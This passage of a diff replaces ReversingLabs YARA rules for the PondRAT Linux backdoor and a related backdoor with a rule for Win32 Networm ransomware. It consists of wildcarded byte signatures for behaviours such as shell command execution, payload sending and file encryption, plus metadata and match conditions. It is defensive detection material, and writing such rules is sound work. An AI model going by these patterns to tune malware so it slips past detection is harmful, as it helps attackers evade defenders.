+            ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ??
+            39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D
+            ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
+            ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
+            45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ??
+            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24
+            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ??
+            ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
         }
-		$download_file_v3_p1 = {
-            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
-            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89
-            8C 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 4C 24
-            ?? 48 89 B4 24 ?? ?? ?? ?? 48 89 F8 48 89 F3 E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C
-            24 ?? 48 8D 8C 24 ?? ?? ?? ?? 44 0F 11 39 48 8D 94 24 ?? ?? ?? ?? 44 0F 11 3A 48 8B
-            54 24 ?? 48 8B 72 ?? 48 8B 7A ?? 48 89 F0 48 89 FB 0F 1F 00 E8 ?? ?? ?? ?? 48 8D 0D
-            ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 82
-            ?? ?? ?? ?? 48 8B 9A ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ??
-            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 0F
-            1F 44 00 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? 44 0F 11 39 48 8D 94 24 ?? ?? ?? ?? 44 0F
-            11 3A E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48
-            8B 44 24 ?? 48 8B 5C 24 ?? 0F 1F 00 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24
-            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C 24
-            ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 89 C7 48 89
+		$encrypt_files_p6 = {
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 8B 00
+            89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 85 ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? 8D 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 3D ??
+            ?? ?? ?? 77 ?? 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 EC ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45
+            ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ?? C7 44 24 ?? ?? ?? ?? ?? 89 C1 89 54 24 ?? 8B 45
+            ?? 89 44 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 3B 55 ?? 89 95 ?? ?? ?? ?? 0F 85 ?? ?? ??
+            ?? 8B 45 ?? 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C1 E8 ?? 89 8D ?? ?? ?? ?? 85 C0
+            89 85 ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 89 85 ??
+            ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 45 ?? ?? 83 85 ?? ?? ?? ??
+            ?? 8B 55 ?? 39 95 ?? ?? ?? ?? 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
         }
-		$download_file_v3_p2 = {
-            DE 45 31 C0 45 31 C9 4D 89 CA 48 8B 44 24 ?? 48 8D 1D ?? ?? ?? ?? 48 89 CA B9 ?? ??
-            ?? ?? FF D2 48 85 DB 0F 85 ?? ?? ?? ?? 48 81 78 ?? ?? ?? ?? ?? 75 ?? 48 8B 08 48 8B
-            78 ?? 48 8B 70 ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ??
-            0F 1F 40 ?? E8 ?? ?? ?? ?? 48 85 C0 74 ?? 31 C9 48 89 C7 48 89 DE 31 C0 48 89 CB 48
-            8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 31 C0 48 8B 5C 24 ?? 48 8B 4C 24 ?? E8
-            ?? ?? ?? ?? 31 FF 31 F6 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 44 0F 11 7C
-            24 ?? 48 8B 40 ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 44 24 ??
-            48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 4C 24 ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ??
-            ?? ?? 31 C9 48 89 C7 48 89 DE 31 C0 48 89 CB 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ??
-            ?? ?? C3 31 C0 48 89 DF 48 89 CE 31 DB 48 89 D9 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ??
-            ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48 89 7C 24 ?? 48 89 74 24
-            ?? 0F 1F 00 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ?? 48 8B 7C 24
-            ?? 48 8B 74 24
+		$encrypt_files_p7 = {
+            C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 4D ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ?? 89 4C 24
+            ?? 8B 95 ?? ?? ?? ?? 89 54 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 83 EC ?? 3B 4D ?? 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ??
+            ?? ?? 89 14 24 E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? C6 45 ??
+            ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52
+            8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24
+            ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 04 24 C7
+            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 50 8D 4D ?? 8B 45 ?? 39 C8 74 ?? 89 04 24 E8 ??
+            ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 89 45 ?? E9
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( ( $network_communication_v1 ) and ( $send_system_information_v1 ) and ( all of ( $download_file_v1_p* ) ) ) or ( ( $network_communication_v2 ) and ( all of ( $download_file_v2_p* ) ) and ( $send_system_information_v2 ) ) or ( ( $network_communication_v3 ) and ( $get_mac_address_v3 ) and ( all of ( $download_file_v3_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-rule REVERSINGLABS_Linux_Backdoor_Pondrat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Networm : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects PondRAT backdoor."
+		description = "Yara rule that detects Networm ransomware."
 		author = "ReversingLabs"
-		id = "4169846b-5333-5dfb-886a-8699ae95fc96"
-		date = "2025-09-22"
-		modified = "2025-09-22"
+		id = "3b17b97d-c882-5f65-8b89-847e2300873c"
+		date = "2021-07-05"
+		modified = "2021-07-05"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.PondRAT.yara#L1-L99"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Networm.yara#L1-L103"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d3a1e7fa39e35574164ebdb1c4d8b63937cb4ee135734056efc24771151c1091"
+		logic_hash = "ff9bcb9868522f9d4abf2ab9f94d5b7c9b009e5c6d0cf832c7d052f18e048b31"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "PondRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Networm"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$connect_proxy_p1 = {
-            41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 89 C5 4C 8D A4
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 C7 00 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? BF ?? ??
-            ?? ?? 89 6B ?? 48 89 E5 89 43 ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 C2 BE
-            ?? ?? ?? ?? 48 89 DF 49 89 C5 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89
-            DF 31 DB E8 ?? ?? ?? ?? 48 89 D8 48 89 E7 B9 ?? ?? ?? ?? F3 48 AB 8B 15 ?? ?? ?? ??
-            BE ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 48 89 D8 B9 ?? ?? ?? ?? 4C
-            89 E7 F3 48 AB 48 8D B4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 49 B8 ?? ?? ?? ?? ??
-            ?? ?? ?? 4C 89 84 24 ?? ?? ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 48 89 F7 48 89 A4 24
-            ?? ?? ?? ?? B1 ?? F3 48 AB 48 89 D7 B1 ?? F3 48 AB 48 89 E1 8B 19 48 83 C1 ?? 8D 83
-            ?? ?? ?? ?? F7 D3 21 D8 25 ?? ?? ?? ?? 74 ?? 89 C3 48 BF ?? ?? ?? ?? ?? ?? ?? ?? 48
-            89 B4 24 ?? ?? ?? ?? C1 EB ?? A9 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 0F 44 C3 48 8D
+		$find_files = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? 8B 7D ?? 33 DB
+            6A ?? 59 33 C0 89 5D ?? 89 4D ?? 66 89 45 ?? 89 5D ?? 89 5D ?? 89 4D ?? 66 89 45 ??
+            68 ?? ?? ?? ?? 8B D7 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? 3B C8
+            74 ?? 88 9D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ??
+            8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D
+            ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? F6 85
+            ?? ?? ?? ?? ?? 8D 45 ?? 74 ?? 6A ?? 50 8B CE E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ??
+            ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 8B 1D ?? ?? ?? ?? FF D3 8B F0 83 FE ?? 75 ?? 83 7F ?? ?? 8B C7 72 ?? 8B 07 68
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 7F ?? ?? 72 ?? 8B 3F 57 FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? FF D3 8B F0 EB ?? FF 15 ?? ?? ?? ?? EB ?? 33 F6 8D 4D ?? E8 ?? ??
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2
         }
-		$connect_proxy_p2 = {
-            59 ?? BF ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 48 0F 44
-            CB 00 C0 8B 84 24 ?? ?? ?? ?? 48 83 D9 ?? 48 BB ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? 48 29 E9 48 89 9C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? 89 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 89 84 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 C6
-            4C 89 E7 48 89 C3 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 4C 89 EF 89 C5 E8 ?? ?? ?? ?? 85 ED 75 ?? BF ?? ?? ?? ?? B9 ?? ?? ??
-            ?? 48 89 DE F3 A6 74 ?? 48 89 DF BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
-            89 E8 5B 5D 41 5C 41 5D C3 0F 1F 00 48 89 DF E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 89
-            E8 5B 5D 41 5C 41 5D C3
+		$remote_connection_p1 = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1
+            FF 15 ?? ?? ?? ?? 33 C0 50 50 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 57 56
+            FF 15 ?? ?? ?? ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB
+            ?? 81 3B ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? EB ?? 81 3B ?? ?? ??
+            ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ?? ?? 8D 75 ?? 8B
+            45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E 33 CD 5B E8 ??
+            ?? ?? ?? C9 C3
         }
-		$send_payload = {
-            41 55 B8 ?? ?? ?? ?? 41 54 55 89 F5 53 48 89 FB 48 81 EC ?? ?? ?? ?? 48 85 FF 0F 84
-            ?? ?? ?? ?? BF ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ??
-            ?? ?? 89 EE 48 89 DF 48 89 C2 31 DB 49 89 C4 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D
-            6C 24 ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ?? 48 89 D8 B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? BE
-            ?? ?? ?? ?? F3 48 AB C7 07 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 89 D8 B9 ?? ?? ??
-            ?? 4C 89 EF F3 48 AB 48 8D B4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 49 BB ?? ?? ??
-            ?? ?? ?? ?? ?? 4C 89 9C 24 ?? ?? ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 48 89 F7 48 89
-            AC 24 ?? ?? ?? ?? B1 ?? F3 48 AB 48 89 D7 B1 ?? F3 48 AB 48 89 E9 8B 19 48 83 C1 ??
-            8D 83 ?? ?? ?? ?? F7 D3 21 D8 25 ?? ?? ?? ?? 74 ?? 89 C3 49 BA ?? ?? ?? ?? ?? ?? ??
-            ?? 49 B9 ?? ?? ?? ?? ?? ?? ?? ?? C1 EB ?? A9 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 44 C3 48
-            8D 59 ?? 4C 89 94 24 ?? ?? ?? ?? 48 89 B4 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? 48
-            0F 44 CB 00 C0 8B 84 24 ?? ?? ?? ?? 48 83 D9 ?? 48 89 94 24 ?? ?? ?? ?? 66 C7 84 24
-            ?? ?? 00 00 ?? ?? 48 29 E9 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 89
-            84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48
-            89 C6 4C 89 EF 48 89 C3 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DE F3 A6 74 ??
-            4C 89 E7 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
-            5B 5D 41 5C 41 5D C3
+		$remote_connection_p2 = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1
+            FF 15 ?? ?? ?? ?? 33 C0 50 50 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ??
+            ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB ?? 81 3B ?? ??
+            ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ??
+            ?? 8D 75 ?? 8B 45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E
+            33 CD 5B E8 ?? ?? ?? ?? C9 C3
         }
-		$execute_shell_command = {
-            41 57 48 89 FE 41 56 41 55 41 54 55 53 BB ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 85 FF
-            0F 84 ?? ?? ?? ?? BD ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48
-            89 E9 F3 48 A5 8B 06 48 89 CD B1 ?? 89 07 48 8D BC 24 ?? ?? ?? ?? 48 89 E8 F3 48 AB
-            31 FF E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 49 89 C6 48 89 DF 48 89 E8 48 8D 94 24 ?? ?? ??
-            ?? BE ?? ?? ?? ?? F3 48 AB 48 83 C2 ?? 48 89 DF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89
-            DF E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 84 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8D 9C
-            24 ?? ?? ?? ?? 4C 8D 7C 24 ?? 45 31 E4 31 ED E8 ?? ?? ?? ?? 31 D2 89 C7 41 89 C5 BE
-            ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 80 CC ?? BE ?? ?? ?? ?? 44 89 EF 89 C2 31 C0 E8 ??
-            ?? ?? ?? 0F 1F 44 00 ?? 31 C0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB BA ?? ?? ?? ?? 48 89
-            DE 44 89 EF E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 C0 74 ?? 44 8D 24 28 41 81 FC ?? ?? ??
-            ?? 77 ?? 89 ED 48 63 D0 48 89 DE 49 8D 3C 2F E8 ?? ?? ?? ?? 31 FF E8 ?? ?? ?? ?? 4C
-            29 F0 48 83 F8 ?? 0F 87 ?? ?? ?? ?? 44 89 E5 45 31 E4 EB ?? 0F 1F 84 00 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 38 ?? 75 ?? 41 83 C4 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 83 FC ??
-            0F 8E ?? ?? ?? ?? 41 89 EC BB ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? BF ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 45 85 E4 74 ?? 48 8D 7C 24 ?? 44 89 E6 E8 ?? ?? ?? ?? 48 81 C4 ??
-            ?? ?? ?? 89 D8 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 45 ?? 83 F8 ?? C7 45 ?? ?? ?? ?? ?? 0F
+            94 C7 83 F8 ?? 0F 94 C3 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 0F B6 C3 83 F0 ?? 8D 04
+            45 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B C8 89 4E ??
+            85 C9 0F 84 ?? ?? ?? ?? 84 FF 74 ?? BF ?? ?? ?? ?? EB ?? 0F B6 C3 8D 3C 45 ?? ?? ??
+            ?? 8B 56 ?? 8B 46 ?? 85 D2 7C ?? 0F 8F ?? ?? ?? ?? 85 C0 72 ?? 85 D2 7C ?? 0F 8F ??
+            ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 55 ?? EB ?? 0F 57 C0 66 0F 13
+            45 ?? 8B 45 ?? FF 75 ?? 50 FF 75 ?? FF 75 ?? 57 51 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D
+            4D ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
+            59 5F 5E 5B 8B E5 5D C2
+        }
+		$encrypt_files_p2 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C5
+            50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ??
+            ?? 8B 4D ?? 85 C9 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 45 ?? 85 C0 74 ?? 0F
+            8E ?? ?? ?? ?? 83 F8 ?? 7E ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB ?? F6 C1 ?? C7 45 ?? ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 0F 95 C0 40 89 45 ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83
+            7D ?? ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83 7D ?? ?? 0F 82 ??
+            ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8D 45 ?? 8B
+            CE 50 E8 ?? ?? ?? ?? 8D 45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C2 ?? ?? 8D 45 ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ??
+            ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45
